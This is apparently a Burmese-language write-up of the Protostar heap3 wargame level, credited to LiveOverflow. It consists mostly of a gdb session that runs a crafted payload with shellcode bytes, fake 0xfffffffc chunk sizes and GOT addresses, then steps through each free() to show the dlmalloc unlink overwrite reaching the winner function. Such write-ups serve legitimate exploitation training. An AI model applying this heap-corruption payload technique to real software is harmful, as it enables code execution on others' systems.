Error တက္ေနတုန္းပဲ ။ Debug လုပ္ၾကည့္ေပးပါ။ အရမး္ရွည္ေနလို႕ အဲဒါေတြ မျပေတာ့ပါဘူး

အဓိကေတာ့ -4  နွုတ္လိုက္တဲ့အခ်ိန္မွာ data အေနနဲ႕ေရာက္ေနတဲ့ value ထဲမွာ 42 ေတြျဖစ္ေနတာက ျပသနာတက္ေစတာပါ။ တကယ္လုို႕ နွတ္လိုက္လဲ ဘာမွမျဖစ္ဖို႕အတြက္ ဆိုရင္ေတာ့ 0xff ေတြကိုထည့္ေပးလိုက္မယ္ဆိုရင္ အဆင္ေျပသြားပါလိမ့္မယ္။

ေအာက္က result မွာၾကည့္ေပးပါ ။ တစ္ဆင့္ခ်င္းၾကည့္ရင္သေဘာေပါက္သြားမွာပါ

(gdb) r `python -c 'print "AAAAAAAA\x68\x64\x88\x04\x08\xc3 " + "\xff"*32 + "\xfc\xff\xff\xff"*2 + " CCCC\x1c\xb1\x04\x08\x04\xc0\x04\x08"'`

Starting program: /opt/protostar/bin/heap3 `python -c 'print "AAAAAAAA\x68\x64\x88\x04\x08\xc3 " + "\xff"*32 + "\xfc\xff\xff\xff"*2 + " CCCC\x1c\xb1\x04\x08\x04\xc0\x04\x08"'`
0x804c000:      0x00000000      0x00000029      0x41414141      0x41414141
0x804c010:      0x04886468      0x0000c308      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0xffffffff      0xffffffff      0xffffffff      0xffffffff
0x804c040:      0xffffffff      0xffffffff      0xffffffff      0xffffffff
0x804c050:      0xfffffffc      0xfffffffc      0x43434343      0x0804b11c
0x804c060:      0x0804c004      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048911 <main+136>:   call   0x8049824 <free>
0x8048916 <main+141>:   mov    0x18(%esp),%eax
0xbffffc50:     0x0804c058      0xbffffe89      0x0804ab50      0xbffffc78
0xbffffc60:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc70:     0x0804ab50      0x00000000      0xbffffcf8      0xb7eadc76
0xbffffc80:     0x00000004      0xbffffd24      0xbffffd38      0xb7fe1848
0xbffffc90:     0xbffffce0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffca0:     0x00000001      0xbffffce0      0xb7ff0626      0xb7fffab0
0xbffffcb0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcc0:     0xbffffcf8      0xb2b78d52      0x98f6fb42      0x00000000
eax            0x804c058        134529112
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0xd      13

Breakpoint 1, 0x08048911 in main (argc=4, argv=0xbffffd24) at heap3/heap3.c:24
24      heap3/heap3.c: No such file or directory.
        in heap3/heap3.c
(gdb) ni
0x804c000:      0x00000000      0x00000029      0x41414141      0x0804b11c
0x804c010:      0x04886468      0x0000c308      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0xffffffff      0xffffffff      0xffffffff      0xffffffff
0x804c040:      0xffffffff      0xffffffff      0xffffffff      0xfffffff8
0x804c050:      0xfffffffc      0xfffffffc      0xfffffff9      0x0804b194
0x804c060:      0x0804b194      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048916 <main+141>:   mov    0x18(%esp),%eax
0x804891a <main+145>:   mov    %eax,(%esp)
0xbffffc50:     0x0804c058      0xbffffe89      0x0804ab50      0xbffffc78
0xbffffc60:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc70:     0x0804ab50      0x00000000      0xbffffcf8      0xb7eadc76
0xbffffc80:     0x00000004      0xbffffd24      0xbffffd38      0xb7fe1848
0xbffffc90:     0xbffffce0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffca0:     0x00000001      0xbffffce0      0xb7ff0626      0xb7fffab0
0xbffffcb0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcc0:     0xbffffcf8      0xb2b78d52      0x98f6fb42      0x00000000
eax            0x20000  131072
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0xf88    3976
25      in heap3/heap3.c
(gdb) ni
0x804c000:      0x00000000      0x00000029      0x41414141      0x0804b11c
0x804c010:      0x04886468      0x0000c308      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0xffffffff      0xffffffff      0xffffffff      0xffffffff
0x804c040:      0xffffffff      0xffffffff      0xffffffff      0xfffffff8
0x804c050:      0xfffffffc      0xfffffffc      0xfffffff9      0x0804b194
0x804c060:      0x0804b194      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804891a <main+145>:   mov    %eax,(%esp)
0x804891d <main+148>:   call   0x8049824 <free>
0xbffffc50:     0x0804c058      0xbffffe89      0x0804ab50      0xbffffc78
0xbffffc60:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc70:     0x0804ab50      0x00000000      0xbffffcf8      0xb7eadc76
0xbffffc80:     0x00000004      0xbffffd24      0xbffffd38      0xb7fe1848
0xbffffc90:     0xbffffce0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffca0:     0x00000001      0xbffffce0      0xb7ff0626      0xb7fffab0
0xbffffcb0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcc0:     0xbffffcf8      0xb2b78d52      0x98f6fb42      0x00000000
eax            0x804c030        134529072
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0xf88    3976
0x0804891a      25      in heap3/heap3.c
(gdb)
0x804c000:      0x00000000      0x00000029      0x41414141      0x0804b11c
0x804c010:      0x04886468      0x0000c308      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0xffffffff      0xffffffff      0xffffffff      0xffffffff
0x804c040:      0xffffffff      0xffffffff      0xffffffff      0xfffffff8
0x804c050:      0xfffffffc      0xfffffffc      0xfffffff9      0x0804b194
0x804c060:      0x0804b194      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804891d <main+148>:   call   0x8049824 <free>
0x8048922 <main+153>:   mov    0x14(%esp),%eax
0xbffffc50:     0x0804c030      0xbffffe89      0x0804ab50      0xbffffc78
0xbffffc60:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc70:     0x0804ab50      0x00000000      0xbffffcf8      0xb7eadc76
0xbffffc80:     0x00000004      0xbffffd24      0xbffffd38      0xb7fe1848
0xbffffc90:     0xbffffce0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffca0:     0x00000001      0xbffffce0      0xb7ff0626      0xb7fffab0
0xbffffcb0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcc0:     0xbffffcf8      0xb2b78d52      0x98f6fb42      0x00000000
eax            0x804c030        134529072
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0xf88    3976
0x0804891d      25      in heap3/heap3.c
(gdb)
0x804c000:      0x00000000      0x00000029      0x41414141      0x0804b11c
0x804c010:      0x04886468      0x0000c308      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x00000000      0xffffffff      0xffffffff      0xffffffff
0x804c040:      0xffffffff      0xffffffff      0xffffffff      0xfffffff8
0x804c050:      0xfffffffc      0xfffffffc      0xfffffff9      0x0804b194
0x804c060:      0x0804b194      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048922 <main+153>:   mov    0x14(%esp),%eax
0x8048926 <main+157>:   mov    %eax,(%esp)
0xbffffc50:     0x0804c030      0xbffffe89      0x0804ab50      0xbffffc78
0xbffffc60:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc70:     0x0804ab50      0x00000000      0xbffffcf8      0xb7eadc76
0xbffffc80:     0x00000004      0xbffffd24      0xbffffd38      0xb7fe1848
0xbffffc90:     0xbffffce0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffca0:     0x00000001      0xbffffce0      0xb7ff0626      0xb7fffab0
0xbffffcb0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcc0:     0xbffffcf8      0xb2b78d52      0x98f6fb42      0x00000000
eax            0x804b170        134525296
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x804c028        134529064
26      in heap3/heap3.c
(gdb)
0x804c000:      0x00000000      0x00000029      0x41414141      0x0804b11c
0x804c010:      0x04886468      0x0000c308      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x00000000      0xffffffff      0xffffffff      0xffffffff
0x804c040:      0xffffffff      0xffffffff      0xffffffff      0xfffffff8
0x804c050:      0xfffffffc      0xfffffffc      0xfffffff9      0x0804b194
0x804c060:      0x0804b194      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048926 <main+157>:   mov    %eax,(%esp)
0x8048929 <main+160>:   call   0x8049824 <free>
0xbffffc50:     0x0804c030      0xbffffe89      0x0804ab50      0xbffffc78
0xbffffc60:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc70:     0x0804ab50      0x00000000      0xbffffcf8      0xb7eadc76
0xbffffc80:     0x00000004      0xbffffd24      0xbffffd38      0xb7fe1848
0xbffffc90:     0xbffffce0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffca0:     0x00000001      0xbffffce0      0xb7ff0626      0xb7fffab0
0xbffffcb0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcc0:     0xbffffcf8      0xb2b78d52      0x98f6fb42      0x00000000
eax            0x804c008        134529032
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x804c028        134529064
0x08048926      26      in heap3/heap3.c
(gdb)
0x804c000:      0x00000000      0x00000029      0x41414141      0x0804b11c
0x804c010:      0x04886468      0x0000c308      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x00000000      0xffffffff      0xffffffff      0xffffffff
0x804c040:      0xffffffff      0xffffffff      0xffffffff      0xfffffff8
0x804c050:      0xfffffffc      0xfffffffc      0xfffffff9      0x0804b194
0x804c060:      0x0804b194      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048929 <main+160>:   call   0x8049824 <free>
0x804892e <main+165>:   movl   $0x804ac27,(%esp)
0xbffffc50:     0x0804c008      0xbffffe89      0x0804ab50      0xbffffc78
0xbffffc60:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc70:     0x0804ab50      0x00000000      0xbffffcf8      0xb7eadc76
0xbffffc80:     0x00000004      0xbffffd24      0xbffffd38      0xb7fe1848
0xbffffc90:     0xbffffce0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffca0:     0x00000001      0xbffffce0      0xb7ff0626      0xb7fffab0
0xbffffcb0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcc0:     0xbffffcf8      0xb2b78d52      0x98f6fb42      0x00000000
eax            0x804c008        134529032
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x804c028        134529064
0x08048929      26      in heap3/heap3.c
(gdb)
0x804c000:      0x00000000      0x00000029      0x0804c028      0x0804b11c
0x804c010:      0x04886468      0x0000c308      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x00000000      0xffffffff      0xffffffff      0xffffffff
0x804c040:      0xffffffff      0xffffffff      0xffffffff      0xfffffff8
0x804c050:      0xfffffffc      0xfffffffc      0xfffffff9      0x0804b194
0x804c060:      0x0804b194      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804892e <main+165>:   movl   $0x804ac27,(%esp)
0x8048935 <main+172>:   call   0x8048790 <puts@plt>
0xbffffc50:     0x0804c008      0xbffffe89      0x0804ab50      0xbffffc78
0xbffffc60:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc70:     0x0804ab50      0x00000000      0xbffffcf8      0xb7eadc76
0xbffffc80:     0x00000004      0xbffffd24      0xbffffd38      0xb7fe1848
0xbffffc90:     0xbffffce0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffca0:     0x00000001      0xbffffce0      0xb7ff0626      0xb7fffab0
0xbffffcb0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcc0:     0xbffffcf8      0xb2b78d52      0x98f6fb42      0x00000000
eax            0x804b170        134525296
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x804c000        134529024
28      in heap3/heap3.c
(gdb)
0x804c000:      0x00000000      0x00000029      0x0804c028      0x0804b11c
0x804c010:      0x04886468      0x0000c308      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x00000000      0xffffffff      0xffffffff      0xffffffff
0x804c040:      0xffffffff      0xffffffff      0xffffffff      0xfffffff8
0x804c050:      0xfffffffc      0xfffffffc      0xfffffff9      0x0804b194
0x804c060:      0x0804b194      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x8048935 <main+172>:   call   0x8048790 <puts@plt>
0x804893a <main+177>:   leave
0xbffffc50:     0x0804ac27      0xbffffe89      0x0804ab50      0xbffffc78
0xbffffc60:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc70:     0x0804ab50      0x00000000      0xbffffcf8      0xb7eadc76
0xbffffc80:     0x00000004      0xbffffd24      0xbffffd38      0xb7fe1848
0xbffffc90:     0xbffffce0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffca0:     0x00000001      0xbffffce0      0xb7ff0626      0xb7fffab0
0xbffffcb0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcc0:     0xbffffcf8      0xb2b78d52      0x98f6fb42      0x00000000
eax            0x804b170        134525296
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0x804c000        134529024
0x08048935      28      in heap3/heap3.c
(gdb)
that wasn't too bad now, was it? @ 1523508788
0x804c000:      0x00000000      0x00000029      0x0804c028      0x0804b11c
0x804c010:      0x04886468      0x0000c308      0x00000000      0x00000000
0x804c020:      0x00000000      0x00000000      0x00000000      0x00000029
0x804c030:      0x00000000      0xffffffff      0xffffffff      0xffffffff
0x804c040:      0xffffffff      0xffffffff      0xffffffff      0xfffffff8
0x804c050:      0xfffffffc      0xfffffffc      0xfffffff9      0x0804b194
0x804c060:      0x0804b194      0x00000000      0x00000000      0x00000000
0x804c070:      0x00000000      0x00000000      0x00000000      0x00000f89
0x804c080:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c090:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0a0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0b0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0c0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804c0d0:      0x00000000      0x00000000      0x00000000      0x00000000
0x804893a <main+177>:   leave
0x804893b <main+178>:   ret
0xbffffc50:     0x0804ac27      0xbffffe89      0x0804ab50      0xbffffc78
0xbffffc60:     0xb7ec6365      0x0804c008      0x0804c030      0x0804c058
0xbffffc70:     0x0804ab50      0x00000000      0xbffffcf8      0xb7eadc76
0xbffffc80:     0x00000004      0xbffffd24      0xbffffd38      0xb7fe1848
0xbffffc90:     0xbffffce0      0xffffffff      0xb7ffeff4      0x08048576
0xbffffca0:     0x00000001      0xbffffce0      0xb7ff0626      0xb7fffab0
0xbffffcb0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffcc0:     0xbffffcf8      0xb2b78d52      0x98f6fb42      0x00000000
eax            0x2e     46
ebx            0xb7fd7ff4       -1208123404
ecx            0x0      0
edx            0xb7fd9340       -1208118464
29      in heap3/heap3.c

Thanks

😀

Ref : liveoverflow